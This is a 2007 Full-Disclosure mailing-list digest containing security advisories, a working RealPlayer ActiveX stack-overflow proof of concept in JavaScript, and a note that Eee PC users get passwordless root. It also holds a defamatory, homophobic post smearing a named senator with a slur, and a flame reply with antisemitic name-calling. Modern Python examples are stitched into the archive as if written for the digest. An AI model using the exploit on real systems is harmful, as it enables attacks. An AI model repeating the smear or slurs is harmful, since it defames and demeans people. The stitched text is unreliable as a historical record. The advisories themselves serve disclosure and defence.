[Full-disclosure] Announce: RFIDIOt release RFIDIOt-0.1r, November 2007

2007-11-27 Thread Adam Laurie
Folks,

I'm pleased to bring you the latest update to RFIDIOt, the open source 
python library for RFID exploration...

This release is brought to you courtesy of United Airlines, who bumped 
me from my flight thereby condemning me to 8 hours in the largest, 
shiniest, emptiest and most soul-destroying lounge I've ever had the 
misfortune to set foot in... If ever there was motivation to lose 
yourself in python, this was it... :)

From CHANGES:

   v0.r
   add SCM Microsystems reader support
   add -d (debug) option
   switch to T=1 protocol for PC/SC
   add auto-detect of PC/SC reader types
   fix minor reporting issues in readmifaresimple.py
   fix setting of tag type 'ALL' on ACG readers (different for LF or HF)
   added a bunch of PCSC ATR card types
   add reading of previously stored files to mrpkey.py
   fix CBEFF processing in mrpkey.py
   fix bruteforcing of first character in mrpkey.py [Petter Bjorklund]
   add ID Card processing to mrpkey.py [vonJeek mailto:[EMAIL PROTECTED]]

The main change is processing the Biometric block in e-passports, which 
should now work correctly for all nations, and adding ID cards (thanks 
to vonJeek)... Please let me know if you find any exceptions. ID cards 
have so far only been tested on NL cards.

Full details here:

   http://rfidiot.org

enjoy,
Adam
-- 
Adam Laurie
The Bunker Secure Hosting Ltd.
Ash Radar Station
Marshborough Road
Sandwich
Kent
CT13 0PL
UNITED KINGDOM
Tel: +44 (0) 1304 814800
Fax: +44 (0) 1304 814899
mailto:[EMAIL PROTECTED]
PGP key on keyservers

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Trent Lott

2007-11-27 Thread Ned Bender
Chester Trent Lott Sr. is  was a crappy Senator from Mississippi and a member 
of the Republican Party. He has served in numerous leadership positions, and is 
best known for gay sex with male prostitutes. 
On November 26 2007, Lott announced his intent to resign from his Senate seat 
by the end of 2007, in order to pursue something else in the private sector 
or to teach. The truth was he left because he was about to be exposed for being 
a complete faggot IRL [1]

Some male whore named Benjamin Nicholas alleged to have been involved with is 
the married Sen. Trent Lott, who unexpectedly announced his retirement. Lott is 
well-known to have been against a plethora of gay rights issues throughout his 
terms in Congress. He was also good friends with Sen. Larry Craig throughout 
his time in Congress. 
Nicholas didn’t want to go on the record to talk about his dealings with Lott, 
because, said Nicholas, “Trent is going through his fair share of scrutiny 
right now and I don’t want to add to it.” However, e-mail and other records 
confirm that the two have met on at least two occasions. “All I can say at this 
point is no comment,” Nicholas. “It’s the professional thing for me to do.” In 
a subsequent e-mail message, Nicholas confirmed that another publication is 
working on a story about a “possible relationship” between Lott and himself, 
but Nicholas also “politely declined” an interview for that story. “As I said 
before, Lott has quite a bit on his plate right now and I don’t really want to 
add fuel to the embers,” Nicholas explained. 
 HUSTLER MAGAZINE EDiot RESEARCH Hustler publisher Larry Flint posted the 
following cryptic message on his website:“Hustler magazine has received 
numerous inquiries regarding the involvement of Larry Flynt and Hustler in the 
resignation of Trent Lott. Senator Lott has been the target of an ongoing 
Hustler investigation for some time now, due to confidential information that 
we have received.”
http://www.encyclopediadramatica.com/Trent_Lott
 


   

[Full-disclosure] CORE-2007-0821: Lotus Notes buffer overflow in the Lotus WorkSheet file processor

2007-11-27 Thread Core Security Technologies Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Core Security Technologies – CoreLabs Advisory
http://www.coresecurity.com/corelabs

Lotus Notes buffer overflow in the Lotus WorkSheet file processor

*Advisory Information*
Title: Lotus Notes buffer overflow in the Lotus WorkSheet file processor
Advisory ID:  CORE-2007-0821
Advisory URL: http://www.coresecurity.com/index.php5?action=itemid=2008
Date published: 2007-11-27
Date of last update: 2007-11-27
Vendors contacted: IBM Corp.
Release mode: COORDINATED RELEASE

*Vulnerability Information*
Class: Input validation error
Remotely Exploitable: Yes
Locally Exploitable: Yes
Bugtraq ID: N/A
CVE Name: N/A

*Vulnerability Description*

Lotus Notes is the integrated email, calendar, instant messenger, browser
and business collaboration application developed by IBM to work as a
desktop client in conjunction with IBM’s Lotus Domino server application.

The email functionality of Lotus Notes supports previewing and processing
file attachments in various formats. To preview and process files in the
Lotus Worksheet File format (WKS) used by Lotus 1-2-3 the email client
uses a library from a third-party software vendor (Autonomy’s Verity
KeyView SDK). Several buffer overflow vulnerabilities were found in the
third-party library used by Lotus Notes to process Lotus 1-2-3 file
attachments.

These vulnerabilities could allow attackers to remotely execute arbitrary
commands on vulnerable systems by attaching a specially crafted file that
triggers exploitation when unsuspecting users attempt to “View” the
attachment. Exploitation of these vulnerabilities requires user intervention.

Although these specific vulnerabilities exist in a third-party component,
the problem is compounded by the way Lotus Notes displays information
about attachments, which makes it easier to elicit unsuspecting assistance
from users in exploiting them. Lotus Notes displays the file type and
corresponding icon based on the attached file's extension rather than the
MIME Content-Type header in the email, whereas the View functionality is
handled by the Verity KeyView component, which processes the attachment
based on the file contents. Exploitation of these vulnerabilities
requires end-user interaction, but the discrepancy described above could
allow an attacker to send a malicious Lotus 1-2-3 file as an attachment
with a seemingly innocuous extension (for example, .JPG or .GIF) that
more easily lures users into viewing it, making the exploitation attempt
more likely to succeed.

These vulnerabilities have been discovered and tested using Lotus Notes
and the Verity KeyView SDK components it uses but other applications that
use the Verity KeyView SDK may be also vulnerable.

*Vulnerable packages*

 - Lotus Notes version 7.x
 - Lotus Notes version 8.x (not confirmed by Core)
 - Lotus Notes version 6.5.6 (not confirmed by Core)
 - Other software packages using Verity KeyView SDK using vulnerable
versions of l123sr.dll

*Non-vulnerable packages*
 N/A

*Solution/Vendor Information/Workaround*

Lotus Notes customers should follow the instructions of the following
support Technote, which outlines the available options based on specific
versions of Lotus Notes:

http://www.ibm.com/support/docview.wss?rs=475uid=swg21285600

Workaround 1: Delete the keyview.ini file in the Notes program directory.
This disables ALL viewers. When a user clicks View (for any file), a
dialog box will display with the message "Unable to locate the viewer
configuration file."

Workaround 2: Delete the problem file, l123sr.dll. When a user tries
to view the specific file type, a dialog box will display with the message
"The viewer display window could not be initialized." All other file types
work without returning the error message.

Workaround 3: Comment out specific lines in keyview.ini for any references
to the problem file (l123sr.dll). To comment out a line, precede it with a
semi-colon (;). When a user tries to view the specific file type, a dialog
box will display with the message "The viewer display window could not be
initialized." For example:
[KVWKBVE]
;81.2.0.5.0=l123sr.dll
;81.2.0.9.0=l123sr.dll

Workaround 4:  Filter inbound emails with attachments with potentially
malicious files.  Lotus 1-2-3 files are usually associated to MIME
Content-Type headers set to the following strings:
 application/lotus-1-2-3
 application/lotus123
 application/x-lotus123
 application/wks
 application/x-wks
 application/vnd.lotus-1-2-3
Note however that workaround #4 is a simple stop-gap measure that could be
circumvented by relatively unsophisticated attackers.
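As an added illustration of Workaround 4 and of the extension-versus-Content-Type discrepancy described above (example code written for this digest, not CORE's or IBM's), the following Python script walks a MIME message with the standard library `email` package and flags attachments whose declared Content-Type is one of the Lotus 1-2-3 types listed, or whose file extension is a Lotus worksheet extension. The `.wk1`/`.wk3`/`.wk4` extensions are assumed additions to the `.wks` the advisory names, and the sample message is constructed for the example (its attachment bodies are placeholder bytes, not real worksheet data).

```python
import email
from email import policy
from email.message import EmailMessage

# Content-Type values the advisory's Workaround 4 associates with Lotus 1-2-3 files.
LOTUS_CONTENT_TYPES = frozenset({
    "application/lotus-1-2-3",
    "application/lotus123",
    "application/x-lotus123",
    "application/wks",
    "application/x-wks",
    "application/vnd.lotus-1-2-3",
})

# ".wks" is the extension the advisory names; the others are assumed Lotus variants.
LOTUS_EXTENSIONS = (".wks", ".wk1", ".wk3", ".wk4")


def flag_lotus_attachments(raw_message: bytes) -> list[dict]:
    """Return one finding per attachment whose declared Content-Type or file
    extension marks it as a Lotus worksheet.  'mismatch' is set when the header
    says Lotus but the extension does not: Notes would show the icon for the
    extension while the KeyView viewer parses the contents."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()        # normalised to lower case
        filename = part.get_filename() or ""
        by_type = ctype in LOTUS_CONTENT_TYPES
        by_ext = filename.lower().endswith(LOTUS_EXTENSIONS)
        if by_type or by_ext:
            findings.append({
                "filename": filename,
                "content_type": ctype,
                "by_content_type": by_type,
                "by_extension": by_ext,
                "mismatch": by_type and not by_ext,
            })
    return findings


def build_sample_message() -> bytes:
    """Constructed test message with three attachments (placeholder bytes only)."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Q3 figures"
    msg.set_content("See attached.")
    # Honestly labelled Lotus attachment: both signals fire.
    msg.add_attachment(b"placeholder-wks-bytes", maintype="application",
                       subtype="vnd.lotus-1-2-3", filename="report.wks")
    # Lotus Content-Type behind an image extension: the discrepancy the advisory describes.
    msg.add_attachment(b"placeholder-wks-bytes", maintype="application",
                       subtype="x-lotus123", filename="photo.jpg")
    # Ordinary image: not flagged by a header-based filter.
    msg.add_attachment(b"placeholder-gif-bytes", maintype="image",
                       subtype="gif", filename="holiday.gif")
    return msg.as_bytes()


def filter_report(raw_message: bytes) -> list[str]:
    """Human-readable summary, one line per flagged attachment."""
    return [
        f"{f['filename']} ({f['content_type']})"
        + (" [extension hides Lotus type]" if f["mismatch"] else "")
        for f in flag_lotus_attachments(raw_message)
    ]


if __name__ == "__main__":
    for line in filter_report(build_sample_message()):
        print(line)
```

Because the filter reads only headers and file names, an attachment declared as `image/gif` with a `.gif` extension but containing Lotus 1-2-3 data passes through untouched, which is exactly why the advisory calls Workaround 4 a stop-gap: closing that gap means inspecting the attachment bytes the way the KeyView viewer does, or disabling the viewer as in Workarounds 1 to 3.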

*Credits*
This vulnerability was discovered by Sebastián Muñiz from the CORE IMPACT
Exploit Writers Team (EWT).

*Technical Description*

Lotus 1-2-3 and Lotus Symphony spreadsheet applications use the Worksheet
File format [1] to persist spreadsheet data on the file system. Lotus
Notes uses a third-party library [2] to process file attachments in the
Lotus Worksheet 

Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

2007-11-27 Thread Elazar Broad
Ouch is right.. I know I confused a lot of people, I apologize for that. 
Anyhow, SecurityFocus moved the PlayerProperty() issue from 22811 to its 
own BID, http://www.securityfocus.com/bid/26586. I have been in contact 
with Symantec's DeepSight team, and it looks like the Import() function 
will still throw a stack overflow exception, however it does not appear 
to overwrite the EIP, making it a plain old DoS attack. I believe they 
plan to post a write-up on this.

Elazar

-Original Message-
From: James Matthews <[EMAIL PROTECTED]>
Sent: Nov 26, 2007 7:24 PM
To: Elazar Broad <[EMAIL PROTECTED]>
Cc: "full-disclosure@lists.grok.org.uk" 
Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

Ouch!

On Nov 26, 2007 9:15 PM, Elazar Broad [EMAIL PROTECTED] wrote:
After some creative Googling, I am revising my original post. I believe 
that the Import() method overflow that I originally posted is really 
http://www.securityfocus.com/bid/26130, although I am not sure why Linux 
is listed under the "Vulnerable" section, so I am taking it out of the 
PoC code. Real claims to have patched this back in October, but I can 
still throw a stack overflow exception via this function using the 
originally stated version of RealPlayer (which I installed last night). 
I am now listing this vulnerability as RealNetworks RealPlayer 
ierpplug.dll ActiveX Control PlayerProperty() Method Stack Overflow, and 
it might be wise to list this under a separate BID. PoC as follows:

-
!--
written by e.b.
--
html
 head
  script language="JavaScript" DEFER
   function Check() {
 var s = "";
 while (s.length  99) s=s+s;
 var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
 var obj2 = obj.PlayerProperty(s);
   }
  /script
 /head
 body
 /body
/html
-

Elazar

-- 
http://www.goldwatches.com/coupons/
http://www.jewelerslounge.com



Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

2007-11-27 Thread Joey Mengele
Holy mother of Hitler will you shut the fuck up already. This is a 
stack overflow not a stack based buffer overflow. There are no 
security implications here. You are worse than Jewha Mati Laurio. 

Elazar, please do not post to this list again. Please leave the 
trolling to the professionals.

J

P.S. Sorry for the swear words John.

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad 
[EMAIL PROTECTED] wrote:
After some creative Googling, I am revising my original post. I 
believe that the Import() method overflow that I originally posted 
is really http://www.securityfocus.com/bid/26130, although I am 
not sure why Linux is listed under the Vulnerable section, so I 
am taking it out of the PoC code. Real claims to have patched this 
back in October, but I can still throw a stack overflow exception 
via this function using the originally stated version of 
RealPlayer(which I installed last night). I am now listing this 
vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX 
Control PlayerProperty() Method Stack Overflow, and it might be 
wise to list this under a separate BID. PoC as follows:

-
!--
written by e.b.
--
html
 head
  script language=JavaScript DEFER
function Check() {
var s = ;

while (s.length  99) s=s+s;

 var obj = new ActiveXObject(IERPCTL.IERPCTL); //{FDC7A535-
4070-4B92-A0EA-D9994BCC0DC5}
   
  var obj2 = obj.PlayerProperty(s);


   }
  /script

 /head
 body onload=JavaScript: return Check();

 /body
/html 
-

Elazar



Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

2007-11-27 Thread Joey Mengele
LOLOLOLOL ok you win, client side denial of service warrants your 5 
electronic mail messages with up to the minute updates. I bet this 
one will be exploited in the wild!

Get a life LOLOL!

J

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad 
[EMAIL PROTECTED] wrote:
Stack Overflow - learn to read. A DoS attack still has some 
security implications...

-Original Message-
From: Joey Mengele [EMAIL PROTECTED]
Sent: Nov 27, 2007 1:05 AM
To: full-disclosure@lists.grok.org.uk, [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer 
ierpplug.dll ActiveX Control Multiple Stack Overflows

Holy mother of Hitler will you shut the fuck up already. This is 
a 
stack overflow not a stack based buffer overflow. There are 
no 
security implications here. You are worse than Jewha Mati Laurio. 


Elazar, please do not post to this list again. Please leave the 
trolling to the professionals.

J

P.S. Sorry for the swear words John.

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad 
[EMAIL PROTECTED] wrote:
After some creative Googling, I am revising my original post. I 
believe that the Import() method overflow that I originally 
posted 
is really http://www.securityfocus.com/bid/26130, although I am 
not sure why Linux is listed under the Vulnerable section, so 
I 
am taking it out of the PoC code. Real claims to have patched 
this 
back in October, but I can still throw a stack overflow 
exception 
via this function using the originally stated version of 
RealPlayer(which I installed last night). I am now listing this 
vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX 
Control PlayerProperty() Method Stack Overflow, and it might be 
wise to list this under a separate BID. PoC as follows:

-
!--
written by e.b.
--
html
 head
  script language=JavaScript DEFER
function Check() {
var s = ;

while (s.length  99) s=s+s;

 var obj = new ActiveXObject(IERPCTL.IERPCTL); //{FDC7A535-

4070-4B92-A0EA-D9994BCC0DC5}
   
  var obj2 = obj.PlayerProperty(s);


   }
  /script

 /head
 body onload=JavaScript: return Check();

 /body
/html 
-

Elazar



Re: [Full-disclosure] Eee PC Security

2007-11-27 Thread Matthew Hall
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Danny wrote:
 Has anyone had a go with/against the Asus Eee PC?

Yes. Open the file browser and get a terminal (/usr/bin/konsole will
do). Then just 'sudo su -' and you're root!
Every user gets ALL=(ALL) NOPASSWD: ALL in sudoers, so not much of a
challenge. Haven't tried any remote exploits, but was running a
(probably customised) 2.6.16 kernel (iirc) so is vulnerable to a couple
of things off the top of my head.

Matt

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iD8DBQFHTEyXw5xT5S6r89URAi7UAJsE7/ZIw4AiPMtwoyFFp+Pv05rS5wCghT+J
Gi7KBFmBiQo4aY4ehF9BcsE=
=biMR
-END PGP SIGNATURE-

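A quick way to check a system for the sudoers configuration Matt describes (every user granted `ALL=(ALL) NOPASSWD: ALL`). This is an added example written for this digest, not part of the original post or of the Eee PC software; the two sample sudoers files are constructed, one resembling that default and one hardened alternative, and the parser handles only the common user-specification syntax (backslash continuations and command tags, but no host lists, `#include` directives or aliases).

```python
import re
from dataclasses import dataclass

# user  host=(runas) [TAG: ...] command, command ...
_USER_SPEC = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
_TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
         "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT"}
_DIRECTIVES = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")


@dataclass
class Finding:
    line_no: int
    user: str
    runas: str


def _logical_lines(text):
    """Yield (first_line_no, joined_text), merging backslash continuations and
    dropping blank lines and '#' lines (comments and #include directives)."""
    buf, start = [], 0
    for no, raw in enumerate(text.splitlines(), 1):
        if not buf:
            start = no
        line = raw.strip()
        if line.endswith("\\"):
            buf.append(line[:-1])
            continue
        buf.append(line)
        joined = " ".join(buf).strip()
        buf = []
        if joined and not joined.startswith("#"):
            yield start, joined


def _split_tags(entry: str):
    """Split leading 'TAG:' prefixes off one comma-separated command entry."""
    tags, rest = [], entry.strip()
    while True:
        m = re.match(r"([A-Z_]+):\s*", rest)
        if not m or m.group(1) not in _TAGS:
            return tags, rest
        tags.append(m.group(1))
        rest = rest[m.end():]


def audit_sudoers(text: str) -> list[Finding]:
    """Flag every user specification that grants ALL commands without a password."""
    findings = []
    for line_no, line in _logical_lines(text):
        if line.startswith(_DIRECTIVES):
            continue
        m = _USER_SPEC.match(line)
        if not m:
            continue
        nopasswd = False  # a tag stays in force for later commands in the same list
        for entry in m.group("cmds").split(","):
            tags, command = _split_tags(entry)
            if "NOPASSWD" in tags:
                nopasswd = True
            if "PASSWD" in tags:
                nopasswd = False
            if nopasswd and command.strip() == "ALL":
                findings.append(Finding(line_no, m.group("user"), m.group("runas") or "root"))
                break
    return findings


# Constructed sample resembling the default described in the post.
EEE_PC_STYLE_SUDOERS = """\
# constructed sample, not a real Eee PC file
Defaults env_reset
root    ALL=(ALL) ALL
%users  ALL=(ALL) NOPASSWD: ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /bin/tar
ops     ALL=(ALL) /usr/bin/systemctl restart nginx, \\
        NOPASSWD: /usr/bin/systemctl status nginx
"""

# Constructed hardened counterpart: a password is required for unrestricted sudo.
HARDENED_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
"""


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/sudoers"
    with open(path, encoding="utf-8", errors="replace") as fh:
        for f in audit_sudoers(fh.read()):
            print(f"{path}:{f.line_no}: {f.user} may run ALL as ({f.runas}) without a password")
```

Scoped NOPASSWD entries such as the `backup` line are deliberately not reported: the finding the post describes is the combination of `NOPASSWD` with `ALL`, which makes every local account equivalent to root.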


[Full-disclosure] [SECURITY] [DSA 1416-1] New tk8.3 packages fix arbitrary code execution

2007-11-27 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1416-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
November 27, 2007 http://www.debian.org/security/faq
- 

Package: tk8.3
Vulnerability  : buffer overflow
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)  : CVE-2007-5378

It was discovered that Tk, a cross-platform graphical toolkit for Tcl,
performs insufficient input validation in the code used to load GIF
images, which may lead to the execution of arbitrary code.

For the stable distribution (etch), this problem has been fixed in
version 8.3.5-6etch1.

Due to a technical limitation in the Debian archive scripts, the update
for the old stable distribution (sarge) cannot be released in sync with
the update for the stable distribution. It will be provided in the coming
days.

We recommend that you upgrade your tk8.3 packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1.dsc
Size/MD5 checksum:  672 de719ed8329448b60a2aa5222d94b4c5
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1.diff.gz
Size/MD5 checksum:28583 de9d57ab9820f98f01a71cab78b9a51c
  http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5.orig.tar.gz
Size/MD5 checksum:  2598030 363a55d31d94e05159e9212074c68004

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-doc_8.3.5-6etch1_all.deb
Size/MD5 checksum:   656798 11b87b5e83e8adfa2e19dc93567c422f

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_alpha.deb
Size/MD5 checksum:   808264 05534d541c67856fd7df57bee0b7448f
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_alpha.deb
Size/MD5 checksum:   870224 c8f3c39de9dbdbe34afc0558653e97f2

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_amd64.deb
Size/MD5 checksum:   691340 3aa055a50b0c1864712cad543240cab6
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_amd64.deb
Size/MD5 checksum:   830790 50c07325658b74d25d06e239012da590

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_arm.deb
Size/MD5 checksum:   649782 33621a77aaf49894dc7962d7579ae2c3
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_arm.deb
Size/MD5 checksum:   802848 7619e44e0c07804307f3b3d59d97589a

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_hppa.deb
Size/MD5 checksum:   888990 d9eaf0227c0594236389bf877747744e
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_hppa.deb
Size/MD5 checksum:   773376 c06fc4983e04a409811c6b070a7d0b4a

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_i386.deb
Size/MD5 checksum:   670426 3bf93bae2527f043b01edb3018de4d90
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_i386.deb
Size/MD5 checksum:   803736 99d6c8562e60a2648817db63555fcbc1

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_ia64.deb
Size/MD5 checksum:  1057842 45e3159db424788b401d4a98c1dfb511
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_ia64.deb
Size/MD5 checksum:   959436 9cce282e61e257655301ad47ddc03ac1

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_mips.deb
Size/MD5 checksum:   824708 437a50b7cfd05d863b9a4a97b596969e
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_mips.deb
Size/MD5 checksum:   725262 8a50f4b098e50fec648ce187139f8af8

mipsel architecture (MIPS (Little Endian))

  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_mipsel.deb
Size/MD5 checksum:   822976 3451e740c116b8fbf77c07e744624637
  

[Full-disclosure] [SECURITY] [DSA 1415-1] New tk8.4 packages fix arbitrary code execution

2007-11-27 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1415-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
November 27, 2007 http://www.debian.org/security/faq
- 

Package: tk8.4
Vulnerability  : buffer overflow
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)  : CVE-2007-5378

It was discovered that Tk, a cross-platform graphical toolkit for Tcl,
performs insufficient input validation in the code used to load GIF
images, which may lead to the execution of arbitrary code.

For the stable distribution (etch), this problem has been fixed in
version 8.4.12-1etch1.

For the old stable distribution (sarge), this problem has been fixed
in version 8.4.9-1sarge1.

We recommend that you upgrade your tk8.4 packages. Updated packages for
sparc will be provided later.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 3.1 (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1.diff.gz
Size/MD5 checksum:19132 8ded0a058cbe9140f905cbd769622d45
  http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9.orig.tar.gz
Size/MD5 checksum:  3266500 1b64258abaf258e9a86f331d8de17a71
  http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1.dsc
Size/MD5 checksum:  672 3a7de8981a9239e231c55486ee308de3
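An added example (not part of Debian's advisory or tooling) for the manual upgrade path given in DSA-1415-1 and DSA-1416-1 above: it parses the `Size/MD5 checksum` lines that follow each URL into a table and checks a downloaded file's size and digest against that table before it is handed to `dpkg -i`. The excerpt constant is copied from the DSA-1416-1 source list above; the file names passed on the command line are the user's own downloads.

```python
import hashlib
import re
from pathlib import Path

# One "Size/MD5 checksum:  <bytes> <md5>" line follows each URL in a DSA file list.
_CHECKSUM_RE = re.compile(r"Size/MD5 checksum:\s*(\d+)\s+([0-9a-f]{32})")

# Excerpt copied from DSA-1416-1 above. The URL sometimes shares a line with the
# indentation and sometimes stands alone; both layouts occur in the advisory.
DSA_1416_SOURCE_EXCERPT = """\
  http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1.dsc
Size/MD5 checksum:  672 de719ed8329448b60a2aa5222d94b4c5
  
http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1.diff.gz
Size/MD5 checksum:28583 de9d57ab9820f98f01a71cab78b9a51c
  http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5.orig.tar.gz
Size/MD5 checksum:  2598030 363a55d31d94e05159e9212074c68004
"""


def parse_dsa_checksums(advisory_text: str) -> dict[str, tuple[int, str]]:
    """Map each package file name (last URL path component) to its (size, md5)."""
    expected = {}
    pending = None
    for line in advisory_text.splitlines():
        line = line.strip()
        if line.startswith(("http://", "https://")):
            pending = line.rsplit("/", 1)[-1]
            continue
        m = _CHECKSUM_RE.search(line)
        if m and pending:
            expected[pending] = (int(m.group(1)), m.group(2))
            pending = None
    return expected


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def verify_bytes(name: str, data: bytes, expected: dict[str, tuple[int, str]]) -> bool:
    """True only if the name is listed and both size and digest match the advisory."""
    if name not in expected:
        return False
    size, digest = expected[name]
    return len(data) == size and md5_hex(data) == digest


def verify_download(path: str, expected: dict[str, tuple[int, str]]) -> bool:
    p = Path(path)
    return verify_bytes(p.name, p.read_bytes(), expected)


if __name__ == "__main__":
    import sys
    table = parse_dsa_checksums(DSA_1416_SOURCE_EXCERPT)
    for path in sys.argv[1:]:
        print(path, "OK" if verify_download(path, table) else "MISMATCH, do not install")
```

The check catches a truncated or corrupted download and a file swapped for one with a different name; it does not replace the advisory's PGP signature or apt's own signed Release chain, since MD5 (what the 2007 advisories publish) is not collision resistant and a capable attacker who can alter the download could alter an unsigned checksum list too.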

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-doc_8.4.9-1sarge1_all.deb
Size/MD5 checksum:   775182 df1628c1fadebdf2ce7d4ab138a0dcca

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_alpha.deb
Size/MD5 checksum:   940380 984e7d1787ea4bf5df7d05be8feaee31
  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_alpha.deb
Size/MD5 checksum:  1031394 a68b8bd438ce30ad2899e893abbdf042

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_amd64.deb
Size/MD5 checksum:   976380 299c8fca87bdbe6a162edea32d44c38d
  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_amd64.deb
Size/MD5 checksum:   810012 3b83261ac52a6a630958969f8b68f044

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_arm.deb
Size/MD5 checksum:   945218 6f016ddd99884ffb1a7fa636d5c157fd
  
http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_arm.deb
Size/MD5 checksum:   823888 2c55586df75b8ce85b71f396aa511ce9

hppa architecture (HP PA RISC)

  
